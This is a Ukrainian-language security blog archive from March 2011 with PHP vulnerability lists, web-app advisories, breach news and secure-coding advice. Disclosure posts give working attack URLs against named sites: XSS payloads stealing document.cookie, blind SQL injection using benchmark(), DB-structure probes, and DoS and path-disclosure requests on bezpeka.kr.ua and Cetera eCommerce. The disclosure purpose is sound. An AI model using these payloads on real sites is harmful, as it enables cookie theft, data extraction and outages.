Архів за Березень, 2011

Місяць безпеки PHP (продовження)

19:12 29.03.2011

Раніше я вже писав про попередні уразливості в PHP та PHP-додатках, оприлюднених в проекті Місяць безпеки PHP. А зараз я наведу останні 21 уразливість, що були оприлюднені торік в Month of PHP Security.

  • MOPS-2010-041: PHP strip_tags() Interruption Information Leak Vulnerability
  • MOPS-2010-042: PHP setcookie() Interruption Information Leak Vulnerability
  • MOPS-2010-043: PHP strtok() Interruption Information Leak Vulnerability
  • MOPS-2010-044: PHP wordwrap() Interruption Information Leak Vulnerability
  • MOPS-2010-045: PHP str_word_count() Interruption Information Leak Vulnerability
  • MOPS-2010-046: PHP str_pad() Interruption Information Leak Vulnerability
  • MOPS-2010-047: PHP trim()/ltrim()/rtrim() Interruption Information Leak Vulnerability
  • MOPS-2010-048: PHP substr_replace() Interruption Information Leak Vulnerability
  • MOPS-2010-049: PHP parse_str() Interruption Memory Corruption Vulnerability
  • MOPS-2010-050: PHP preg_match() Interruption Information Leak Vulnerability
  • MOPS-2010-051: PHP unpack() Interruption Information Leak Vulnerability
  • MOPS-2010-052: PHP pack() Interruption Information Leak Vulnerability
  • MOPS-2010-053: PHP ZEND_FETCH_RW Opcode Interruption Information Leak Vulnerability
  • MOPS-2010-054: PHP ZEND_CONCAT/ZEND_ASSIGN_CONCAT Opcode Interruption Information Leak and Memory Corruption Vulnerability
  • MOPS-2010-055: PHP ArrayObject::uasort() Interruption Memory Corruption Vulnerability
  • MOPS-2010-056: PHP php_mysqlnd_ok_read() Information Leak Vulnerability
  • MOPS-2010-057: PHP php_mysqlnd_rset_header_read() Buffer Overflow Vulnerability
  • MOPS-2010-058: PHP php_mysqlnd_read_error_from_line() Buffer Overflow Vulnerability
  • MOPS-2010-059: PHP php_mysqlnd_auth_write() Stack Buffer Overflow Vulnerability
  • MOPS-2010-060: PHP Session Serializer Session Data Injection Vulnerability
  • MOPS-2010-061: PHP SplObjectStorage Deserialization Use-After-Free Vulnerability

Добірка уразливостей

15:24 29.03.2011

В даній добірці уразливості в веб додатках:

  • HP-UX Running rpc.ttdbserver, Remote Execution of Arbitrary Code (деталі)
  • HP Insight Control for Linux, Remote Execution of Arbitrary Code, Remote Denial of Service (DoS), Remote Unauthorized Access (деталі)
  • SQL injection in SweetRice CMS (деталі)
  • XSS in SweetRice CMS (деталі)
  • HP Insight Software Installer for Windows, Local Unauthorized Access to Data, Remote Cross Site Request Forgery (CSRF) (деталі)
  • Reset admin password in SweetRice CMS (деталі)
  • Shell create & command execution in JAF CMS (деталі)
  • RSA, The Security Division of EMC, informs about potential security vulnerability in RSA enVision versions prior to 3.7 SP1 (деталі)
  • RFI in JAF CMS (деталі)
  • BBcode XSS in MiniBB (деталі)

Уразливості в плагінах для WordPress №41

23:51 28.03.2011

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Sodahead Polls, Smen Social Button та Rating-Widget. Для котрих з’явилися експлоіти. Sodahead Polls - це плагін для стоворення голосувань, Smen Social Button - це плагін для голосування на сайті smen.ro, Rating-Widget - це доповнення до плагіна Comment Rating.

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Місяць безпеки PHP (продовження)

22:49 28.03.2011

Торік я писав про проект Місяць безпеки PHP. В попередньому записі я навів перші двадцять уразливостей в PHP та PHP-додатках, оприлюднених в даному проекті. А зараз я наведу нові 20 уразливостей, що були оприлюднені торік в Month of PHP Security.

  • MOPS-2010-021: PHP fnmatch() Stack Exhaustion Vulnerability
  • MOPS-2010-022: PHP Stream Context Use After Free on Request Shutdown Vulnerability
  • MOPS-2010-023: Cacti Graph Viewer SQL Injection Vulnerability
  • MOPS-2010-024: PHP phar_stream_flush Format String Vulnerability
  • MOPS-2010-025: PHP phar_wrapper_open_dir Format String Vulnerability
  • MOPS-2010-026: PHP phar_wrapper_unlink Format String Vulnerability
  • MOPS-2010-027: PHP phar_parse_url Format String Vulnerabilities
  • MOPS-2010-028: PHP phar_wrapper_open_url Format String Vulnerabilities
  • MOPS-2010-029: CMSQlite c Parameter SQL Injection Vulnerability
  • MOPS-2010-030: CMSQlite mod Parameter Local File Inclusion Vulnerability
  • MOPS-2010-031: e107 Usersettings loginname SQL Injection Vulnerability
  • MOPS-2010-032: PHP iconv_mime_decode() Interruption Information Leak Vulnerability
  • MOPS-2010-033: PHP iconv_substr() Interruption Information Leak Vulnerability
  • MOPS-2010-034: PHP iconv_mime_encode() Interruption Information Leak Vulnerability
  • MOPS-2010-035: e107 BBCode Remote PHP Code Execution Vulnerability
  • MOPS-2010-036: PHP htmlentities() and htmlspecialchars() Interruption Information Leak Vulnerability
  • MOPS-2010-037: PHP str_getcsv() Interruption Information Leak Vulnerability
  • MOPS-2010-038: PHP http_build_query() Interruption Information Leak Vulnerability
  • MOPS-2010-039: PHP strpbrk() Interruption Information Leak Vulnerability
  • MOPS-2010-040: PHP strtr() Interruption Information Leak Vulnerability

Підвищення привілеїв у модулі mpm_itk для Apache

19:08 28.03.2011

Виявлена можливість підвищення привілеїв у модулі mpm_itk для веб сервера Apache.

Уразливі продукти: mpm-itk 2.2.

При певному сполученні умов запит обробляється з підвищеними привілеями.

Уразливості на bezpeka.kr.ua

15:20 28.03.2011

07.09.2010

У квітні, 18.04.2010, я знайшов Insufficient Anti-automation, Cross-Site Scripting, Denial of Service та Full path disclosure уразливості на сайті http://bezpeka.kr.ua (це онлайн магазин, що продає секюріті товари). Про що найближчим часом сповіщу адміністрацію сайта.

Стосовно дірок на сайтах онлайн магазинів в останнє я писав про уразливості на citycom.ua.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

28.03.2011

Insufficient Anti-automation:

http://bezpeka.kr.ua/users/register.html

На даній сторінці використовується уразлива капча. Приклад атаки показаний в експлоіті для PHPShop:

PHPShop CAPTCHA bypass.html

http://bezpeka.kr.ua/users/sendpassword.html

На даній сторінці немає захисту від автоматизованих запитів (капчі).

XSS:

POST запит на сторінці http://bezpeka.kr.ua/users/register.html з обходом капчі. Приклад атаки показаний в експлоіті для PHPShop:

PHPShop XSS.html

DoS:

http://bezpeka.kr.ua/search/?words=.&p=all&cat=0

Full path disclosure:

http://bezpeka.kr.ua/page/’

Дані уразливості, окрім FPD, досі не виправлені.

Новини: взлом wiki.php.net, атака на RSA та стандартизація пентесту

22:47 26.03.2011

За повідомленням hackzona.com.ua, невідомі хакери скомпрометували wiki.php.net.

The PHP Group вчора повідомила про успішну атаку на сервер wiki.php.net. У результаті злому, зловмисники зуміли отримати root доступ до сервера і зібрати інформацію про облікові записи користувачів. Отримані дані могли бути використані для внесення змін у вихідні коди PHP.

За повідомленням www.xakep.ru, взлом і крадіжка даних RSA: система ідентифікації SecurID під загрозою.

За офіційною інформацією RSA, яку компанія оприлюднила в цьому місяці, на них була успішно проведена атака. При тому, що дана секюріті компанія весь час себе позиціонує дуже захищеною.

Хакери одержали доступ до серверів RSA і викрали інформацію, що може бути використана для підриву безпеки двухфакторної системи авторизації, використовуваної більш ніж 40 мільйонами співробітників для доступу до важливих корпоративних і урядових мереж.

За повідомленням www.xakep.ru, білі хакери стандартизують пентест.

Дослідники, що перевіряють системи захисту, об’єдналися, щоб створити звід правил з метою підвищити якість роботи хакерів, що трудяться на договірній основі.

Пентестери з усього світу спільно розробляють Стандарт виконання тестів на проникнення (Penetration Testing Execution Standard - PTES), щоб надати клієнтам еталон, що визначить якість іспитів, здійснюваних дослідниками.

Нові уразливості в Cetera eCommerce

19:21 26.03.2011

28.01.2011

У грудні, 14.12.2010, я знайшов нові Cross-Site Scripting, SQL Injection та SQL DB Structure Extraction уразливості в системі Cetera eCommerce (онлайн магазин). Які виявив на демо сайті розробників системи http://ecommerce-demo.cetera.ru (на перші дві XSS звернув мою увагу Maciej Gojny). Причому деякі уразливості стосуються як 14 версії, так і 15 версії Cetera eCommerce, що вийшла у жовтні 2010 року (і яка зараз розміщена на демо сайті).

Раніше я вже писав про уразливості в Cetera eCommerce.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам системи.

26.03.2011

XSS (також працюють в версії 15.0):

http://site/catalog/%3Cscript%3Ealert(document.cookie)%3C/script%3E/
http://site/vendors/%3Cscript%3Ealert(document.cookie)%3C/script%3E/
http://site/catalog/cart/%3Cscript%3Ealert(document.cookie)%3C/script%3E/
http://site/news/%3Cscript%3Ealert(document.cookie)%3C/script%3E/
http://site/news/13012011111030/%3Cscript%3Ealert(document.cookie)%3C/script%3E/

XSS:

http://site/%3Cscript%3Ealert(document.cookie)%3C/script%3E/

Дана уразливість з’явилася в версії 15.0. Уразливість має місце на сторінці з 404 помилкою, тому вона спрацює як за цією адресою, так і за іншими адресами, що ведуть на неіснуючі сторінки.

SQL Injection (blind SQLi):

http://site/catalog/(version()=5.1)/

http://site/catalog/cart/’+benchmark(100000,md5(now()))+’/

SQL DB Structure Extraction:

http://site/catalog/%22/

http://site/catalog/cart/’/

Уразливі Cetera eCommerce 14.0 та попередні версії, а XSS уразливості також стосуються версії 15.0. Останні чотири уразливості вже виправлені в останній версії системи.

Добірка уразливостей

17:14 26.03.2011

В даній добірці уразливості в веб додатках:

  • HP Insight Orchestration for Windows, Remote Unauthorized Access (деталі)
  • HP Systems Insight Manager (SIM) for HP-UX, Linux, and Windows, Remote Execution of Arbitrary Code and Other Vulnerabilities (деталі)
  • XSS vulnerability in MemHT Portal (деталі)
  • Stored XSS (Cross Site Scripting) vulnerability in MemHT Portal (деталі)
  • HP Virtual Connect Enterprise Manager for Windows, Remote Cross Site Scripting (XSS) (деталі)
  • HP Insight Control Server Migration for Windows, Local and Remote Unauthorized Access to Data, Remote Cross Site Request Forgery (CSRF), Cross Site Scripting (XSS) (деталі)
  • Security Advisory for Bugzilla 3.2.8, 3.4.8, 3.6.2, and 3.7.3 (деталі)
  • Zen Cart 1.3.9h Local File Inclusion Vulnerability (деталі)
  • HP Client Automation Enterprise Infrastructure (Radia) Remote Disclosure of Information (деталі)
  • Adsoft Remote Sql Injection Vulnerability (деталі)

Написання безпечних плагінів для WordPress

22:43 25.03.2011

В статті Writing Secure WP Plugins David Kierznowski розповідає про правильні підходи до написання плагінів для WordPress. Про те, як написати безпечний плагін для WP.

В статті наводяться рекомендації по використанню наступних секюріті механізмів:

  • attribute_escape - для захисту від XSS уразливостей.
  • wp_nonce - для захисту від CSRF уразливостей.

Обидва механізми є вбудованими в движок. Окрім них, звісно можна використовувати й інши функції мови PHP та розробляти власні функції для захисту від різних атак та уразливостей. Але зокрема для протидії XSS та CSRF можна використовувати дані механізми.

Додам, що слідкувати за безпекою власних веб додатків потрібно не тільки розробникам плагінів для WP, але й розробникам шаблонів для WP. Тому що уразливості трапляються як в плагінах, так і темах для WordPress.